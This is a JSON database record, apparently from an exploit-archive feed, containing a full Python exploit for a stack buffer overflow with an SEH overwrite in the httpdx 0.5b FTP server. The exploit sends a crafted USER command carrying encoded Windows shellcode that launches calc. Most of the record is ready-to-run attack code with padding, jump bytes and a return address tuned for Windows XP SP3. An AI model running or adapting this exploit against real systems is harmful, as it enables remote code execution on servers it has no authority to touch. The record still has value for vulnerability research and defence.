{"type": "zdt", "lastseen": "2016-04-19T02:47:51", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "httpdx <= 0.5b FTP Server (USER) Remote BOF Exploit (SEH)", "published": "2009-05-18T00:00:00", "href": "http://0day.today/exploit/description/9450", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for windows platform in category remote exploits", "hash": "c0748997c8a05c9d72ec6852e0a5e1ec2eef09a72c54c566d84038bea0b6b4d8", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "=========================================================\r\nhttpdx <= 0.5b FTP Server (USER) Remote BOF Exploit (SEH)\r\n=========================================================\r\n\r\n\r\n\r\n\r\n#!/usr/bin/python\r\n#[*] Usage : httpdx.py [target_ip]\r\n# _ _ _ __ _ _ _ \r\n#| || | (_) ___ / \\ | |__ | | | \r\n#| __ | | | (_-< | () | | / / |_ _|\r\n#|_||_| |_| /__/ \\__/ |_\\_\\ |_| \r\n#\r\n#[*] Bug : httpdx <= 0.5b FTP Server (USER) Remote BOF Exploit (SEH)\r\n#[*] Founder : sico2819\r\n#[*] Tested on : Xp sp3 (EN)(VB)\r\n#[*] Exploited by : His0k4\r\n#[*] Greetings : All friends & muslims HaCkErs (DZ),Algerians Elites,snakespc.com\r\n#[*] Serra7 Merra7 koulchi mderra7 :p\r\n\r\n#[x] Note : I used the case when idm is installed because its dll (idmmbc.dll) is loaded with httpdx.\r\n\r\nimport socket\r\nimport sys\r\n\r\nhost = sys.argv[1] \r\n\r\n# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com\r\nshellcode=(\r\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"\r\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"\r\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"\r\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"\r\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x34\"\r\n\"\\x42\\x50\\x42\\x50\\x42\\x50\\x4b\\x48\\x45\\x34\\x4e\\x33\\x4b\\x58\\x4e\\x37\"\r\n\"\\x45\\x30\\x4a\\x57\\x41\\x50\\x4f\\x4e\\x4b\\x48\\x4f\\x34\\x4a\\x41\\x4b\\x58\"\r\n\"\\x4f\\x45\\x42\\x42\\x41\\x30\\x4b\\x4e\\x49\\x34\\x4b\\x58\\x46\\x33\\x4b\\x38\"\r\n\"\\x41\\x30\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x58\\x42\\x4c\"\r\n\"\\x46\\x57\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x30\\x44\\x4c\\x4b\\x4e\"\r\n\"\\x46\\x4f\\x4b\\x53\\x46\\x45\\x46\\x32\\x46\\x30\\x45\\x57\\x45\\x4e\\x4b\\x58\"\r\n\"\\x4f\\x45\\x46\\x52\\x41\\x30\\x4b\\x4e\\x48\\x36\\x4b\\x38\\x4e\\x50\\x4b\\x44\"\r\n\"\\x4b\\x58\\x4f\\x55\\x4e\\x41\\x41\\x50\\x4b\\x4e\\x4b\\x48\\x4e\\x51\\x4b\\x48\"\r\n\"\\x41\\x30\\x4b\\x4e\\x49\\x48\\x4e\\x35\\x46\\x32\\x46\\x50\\x43\\x4c\\x41\\x33\"\r\n\"\\x42\\x4c\\x46\\x36\\x4b\\x38\\x42\\x44\\x42\\x43\\x45\\x38\\x42\\x4c\\x4a\\x47\"\r\n\"\\x4e\\x50\\x4b\\x48\\x42\\x54\\x4e\\x30\\x4b\\x38\\x42\\x47\\x4e\\x41\\x4d\\x4a\"\r\n\"\\x4b\\x38\\x4a\\x36\\x4a\\x50\\x4b\\x4e\\x49\\x50\\x4b\\x58\\x42\\x58\\x42\\x4b\"\r\n\"\\x42\\x50\\x42\\x50\\x42\\x30\\x4b\\x48\\x4a\\x56\\x4e\\x43\\x4f\\x35\\x41\\x53\"\r\n\"\\x48\\x4f\\x42\\x36\\x48\\x45\\x49\\x38\\x4a\\x4f\\x43\\x38\\x42\\x4c\\x4b\\x57\"\r\n\"\\x42\\x35\\x4a\\x36\\x42\\x4f\\x4c\\x58\\x46\\x50\\x4f\\x55\\x4a\\x56\\x4a\\x49\"\r\n\"\\x50\\x4f\\x4c\\x48\\x50\\x50\\x47\\x45\\x4f\\x4f\\x47\\x4e\\x43\\x46\\x41\\x56\"\r\n\"\\x4e\\x36\\x43\\x36\\x42\\x30\\x5a\")\r\n\r\npayload = shellcode\r\npayload += '\\x41'*(877 - len(shellcode))\r\npayload += '\\xE9\\x8E\\xFC\\xFF\\xFF'\r\npayload += '\\x90'*48\r\npayload += '\\x74\\xC9\\x90\\x90'\r\npayload += '\\x87\\x23\\x02\\x10'\r\npayload += '\\x44'*9000\r\n\r\ns=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nconnect=s.connect((host,21))\r\ns.recv(1024)\r\ns.send('USER '+payload+'\\r\\n')\r\nraw_input(\"[+] Done, press enter to quit\")\r\ns.close()\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "id": "1337DAY-ID-9450", "sourceHref": "http://0day.today/exploit/9450", "modified": "2009-05-18T00:00:00", "reporter": "His0k4", "enchantments": {"vulnersScore": 6.5}}

{"result": {}}